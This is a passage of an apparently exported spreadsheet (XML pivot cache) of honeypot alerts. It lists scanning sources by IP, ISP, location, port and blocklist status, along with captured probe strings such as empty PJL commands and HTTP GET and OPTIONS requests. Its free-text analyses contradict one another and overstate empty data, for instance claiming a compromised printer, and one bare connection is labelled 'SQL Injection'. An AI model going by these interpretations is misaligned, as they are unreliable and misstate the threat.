service, suggesting a potential scanning or probing activity._x000a_A malicious actor may be attempting to exploit vulnerabilities in this service for unauthorized access._x000a_This connection attempt could also be a reconnaissance effort. &amp;&amp; No malicious activity detected, this is likely a normal system check or initialization message indicating no specific activity occurred. The log simply indicates that the service did not receive any data from PJL (Print Job Language). This could be due to a legitimate absence of print jobs being sent. &amp;&amp; The data indicates that a potential malicious actor is attempting to exploit a service by sending an incomplete or malformed request, specifically targeting a feature or plugin (PJL) with no apparent data sent, which could be indicative of a probing or reconnaissance attempt. This may suggest an attacker trying to identify vulnerabilities in the system. The lack of data sent raises suspicions about the true intentions of this activity. &amp;&amp; No malicious activity detected, service not accessed or requested. _x000a_Unknown or null request submitted to system. _x000a_Possible configuration or connection issue reported. &amp;&amp; This data suggests that an attacker is attempting to send printer job information, possibly as part of a larger malicious operation such as scanning or exploiting vulnerabilities related to printer functionality. The command appears to be legitimate but its presence in this context may indicate unwanted access or manipulation. It could also be part of a reconnaissance attempt. &amp;&amp; Possible malicious activity is an attempt to send printer settings information via a spooler service exploit. Malicious actor is probing for vulnerabilities in printer configuration and management systems. This could be a reconnaissance step before launching a more targeted attack. &amp;&amp; This log suggests an attempt to gather information about the system, possibly for further exploitation or reconnaissance. The command appears to be related to printer or printing settings. This activity may indicate a malicious actor probing the system's configuration. &amp;&amp; Possible malicious activity involves exploitation of printer protocol to gain unauthorized access and potentially execute commands remotely, which could lead to further system compromise or data theft, allowing attackers to elevate privileges. This may indicate a vulnerability in the network's print services being exploited by an attacker. The attackers can now issue various system commands through the compromised printer. &amp;&amp; This log indicates a printer-specific command, likely used for malicious purposes such as printing exploits or malicious data to a connected device. It suggests unauthorized access to a network resource. A potential security threat is being executed through this command. &amp;&amp; The attacker is sending a command to print information about the printer, likely as reconnaissance before exploiting it. This suggests an attempt to gather sensitive information from the printer's system. The command itself appears to be designed to elicit printer-specific data. &amp;&amp; Possible malicious activity: An attacker is attempting to gather printer configuration information, likely as part of a reconnaissance or exploitation attempt. This could be the first step in printing malicious documents or spreading malware through the printer. It may also be an attempt to exploit printer vulnerabilities. &amp;&amp; This log suggests an attempt to print job information, possibly to gather sensitive details about the system's printing capabilities and settings. The activity appears to be probing for vulnerabilities related to printer management. &amp;&amp; This log suggests an attempt to execute a malicious command related to printer settings or job manipulation, potentially for unauthorized access or data exfiltration. The nature of the command implies an effort to exploit printer functionality for nefarious purposes. This activity may be part of a larger attack to gain access or manipulate system resources. &amp;&amp; Possible malicious activity is unauthorized access to printer settings, likely an attempt to print sensitive information or exploit vulnerabilities in the printer's control interface for malicious purposes. The attacker is sending a command to retrieve identification and other information from the printer. This could be a reconnaissance step before more serious attacks. &amp;&amp; A printer is being probed or scanned for potential exploitation, possibly as part of a larger attack to install malware or gain unauthorized access. The activity suggests an attempt to identify and manipulate the printer's settings or functionality. This could be a precursor to more severe malicious actions. &amp;&amp; Malicious actor is sending printer job command to exploit vulnerabilities in print services. They are attempting to access and potentially take control of printing infrastructure. This could be a reconnaissance step for further attacks on the network. &amp;&amp; The data suggests an attempt to gather information about the system, possibly through a print job or similar mechanism. This could be indicative of reconnaissance or probing activity by an attacker. The command appears to be related to printer job settings. &amp;&amp; This data suggests a potential printer spool service exploitation attempt, where an attacker is attempting to inject malicious code by exploiting the PJL (Printer Job Language) command. This can be used for unauthorized access or control of the printer and possibly spread malware through the network. The attacker may be trying to gain access to the printer's internal systems. &amp;&amp; This suggests a connection attempt to VNC service was made but no data was sent or received. Malicious actors may use VNC for unauthorized access to systems. No activity was detected, implying the attempt might have been terminated prematurely. &amp;&amp; There is no connection attempt via Remote Desktop Protocol (RDP) to this monitored service. This suggests that an attacker may be trying to exploit RDP vulnerabilities or gain unauthorized access. However, the lack of a valid RDP connection attempt indicates potential probing or reconnaissance activity instead. &amp;&amp; No suspicious activity detected from TELNET service, but data is missing or unavailable for analysis."/>
    <s v="Port Scan &amp;&amp; Scanning Attempt &amp;&amp; Unknown Attack &amp;&amp; Port Scan &amp;&amp; Brute Force &amp;&amp; SYN Scanning &amp;&amp; VNC Scanning"/>
  </r>
  <r>
    <x v="410"/>
    <x v="410"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:25:03"/>
    <d v="2025-04-29T16:23:23"/>
    <d v="2025-04-29T16:25:03"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="residential"/>
    <s v="BHARTI"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa6:bc4d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="411"/>
    <x v="411"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:24:13"/>
    <d v="2025-04-29T16:24:13"/>
    <d v="2025-04-29T16:24:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="S"/>
    <s v="Santa Fe"/>
    <s v="Departamento de San Lorenzo"/>
    <s v="Capitán Bermúdez"/>
    <s v="3862738"/>
    <s v="NA"/>
    <s v="-32.8226"/>
    <s v="-60.7185"/>
    <s v="266702"/>
    <s v="AS266702"/>
    <s v="Megalink S.R.L"/>
    <s v="corporate"/>
    <s v="Ciudad Global S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bec4:f990"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="412"/>
    <x v="412"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:23:46"/>
    <d v="2025-04-29T15:38:12"/>
    <d v="2025-04-29T16:23:46"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="MTNL Delhi"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:ab9d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="413"/>
    <x v="413"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:23:25"/>
    <d v="2025-02-18T16:12:53"/>
    <d v="2025-04-29T16:23:25"/>
    <n v="45"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43"/>
    <s v="1433&amp;&amp;445&amp;&amp;55869&amp;&amp;55893"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Pvt. Ltd"/>
    <s v="residential"/>
    <s v="Atria Convergence Technologies Pvt. Ltd."/>
    <s v="2011-03-24"/>
    <s v="CABLELITE"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,56985)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,57557)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,50984)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,51614)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,53699)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,55803)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,56228)}&amp;&amp;{Data_SMB:Incoming connection (106.51.241.127,57352)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6a33:f17f"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="The data suggests an attempted connection or probing for Microsoft SQL Server service, possibly a reconnaissance activity by a malicious entity to identify potential vulnerabilities. This could be the initial step of a larger attack or just a scanning attempt."/>
    <s v="SQL Injection"/>
  </r>
  <r>
    <x v="414"/>
    <x v="414"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:21:59"/>
    <d v="2025-04-29T16:21:59"/>
    <d v="2025-04-29T16:21:59"/>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f1:b73e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="415"/>
    <x v="415"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T16:11:07"/>
    <d v="2024-12-06T00:05:28"/>
    <d v="2025-04-29T16:11:07"/>
    <n v="196"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H6"/>
    <s v="23&amp;&amp;80&amp;&amp;NA&amp;&amp;23264"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Ubatuba"/>
    <s v="Ubatuba"/>
    <s v="3445847"/>
    <s v="NA"/>
    <s v="-23.4339"/>
    <s v="-45.0711"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b1cb"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="416"/>
    <x v="416"/>
    <s v="NA&amp;&amp;prod-boron-us-west-90.li.binaryedge.ninja"/>
    <x v="0"/>
    <d v="2025-04-29T16:10:15"/>
    <d v="2025-02-16T20:13:27"/>
    <d v="2025-04-29T16:10:15"/>
    <n v="53"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="9100&amp;&amp;23&amp;&amp;110&amp;&amp;5900&amp;&amp;3389&amp;&amp;40788&amp;&amp;NA&amp;&amp;143&amp;&amp;43170&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Alameda"/>
    <s v="Fremont"/>
    <s v="5350734"/>
    <s v="94536"/>
    <s v="37.5485"/>
    <s v="-121.989"/>
    <s v="63949"/>
    <s v="Akamai Technologies, Inc."/>
    <s v="Akamai Technologies, Inc."/>
    <s v="hosting"/>
    <s v="Linode"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;NA&amp;&amp;GET"/>
    <s v="{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.0_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'OPTIONS / HTTP/1.0_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'OPTIONS / RTSP/1.0_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': ' x1e x06x01  x01      x07versionx04bind  x10 x03'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTP:{'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'method': 'OPTIONS', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d4f:6471"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze activity."/>
    <m/>
  </r>
  <r>
    <x v="417"/>
    <x v="417"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T15:52:18"/>
    <d v="2025-04-29T15:52:18"/>
    <d v="2025-04-29T15:52:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:d5ba"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="418"/>
    <x v="418"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T15:29:42"/>
    <d v="2025-02-25T09:08:08"/>
    <d v="2025-04-29T15:29:42"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Bondowoso"/>
    <s v="Tlogosari"/>
    <s v="6829676"/>
    <s v="NA"/>
    <s v="-7.9993"/>
    <s v="113.935"/>
    <s v="150208"/>
    <s v="PT Internusa Duta Makmur"/>
    <s v="PT Internusa Duta Makmur"/>
    <s v="business"/>
    <s v="PT Internusa Duta Makmur"/>
    <s v="2022-08-24"/>
    <s v="IDNIC-IDMNET-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a0:b649"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="419"/>
    <x v="419"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T15:10:51"/>
    <d v="2024-04-15T02:50:55"/>
    <d v="2025-04-29T15:10:51"/>
    <n v="27454"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5900&amp;&amp;40920&amp;&amp;445&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Ferraz de Vasconcelos"/>
    <s v="Ferraz de Vasconcelos"/>
    <s v="3463422"/>
    <s v="NA"/>
    <s v="-23.5408"/>
    <s v="-46.3686"/>
    <s v="10429"/>
    <s v="TELEFÔNICA BRASIL S.A"/>
    <s v="Vivo"/>
    <s v="business"/>
    <s v="TELEF�NICA BRASIL S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,63492)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,63583)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,58705)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,59039)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,62322)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,62595)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,56586)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,57369)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,58171)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,65401)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,53233)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,54057)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,57677)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,58170)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bd39:bfd6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="420"/>
    <x v="420"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T15:04:41"/>
    <d v="2025-04-29T15:04:20"/>
    <d v="2025-04-29T15:04:41"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="['anonymous-proxy']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="True"/>
    <s v="vpn"/>
    <s v="medium"/>
    <s v="['anonymous-proxy']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VT"/>
    <s v="Vermont"/>
    <s v="Orleans"/>
    <s v="North Troy"/>
    <s v="5239255"/>
    <s v="05859"/>
    <s v="44.9945"/>
    <s v="-72.3998"/>
    <s v="21859"/>
    <s v="Zenlayer Inc"/>
    <s v="Zenlayer Inc"/>
    <s v="cellular"/>
    <s v="Mullvad VPN AB"/>
    <s v="2021-07-06"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9d5:c11c"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="421"/>
    <x v="421"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T15:03:16"/>
    <d v="2024-07-08T09:09:00"/>
    <d v="2025-04-29T15:03:16"/>
    <n v="52"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;28574&amp;&amp;1433&amp;&amp;22"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Bandung"/>
    <s v="Ujungberung"/>
    <s v="1622801"/>
    <s v="NA"/>
    <s v="-6.9203600000000005"/>
    <s v="107.679"/>
    <s v="147154"/>
    <s v="PT Pass Internet Indonesia"/>
    <s v="PASSNET"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2022-07-18"/>
    <s v="PASSNET-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
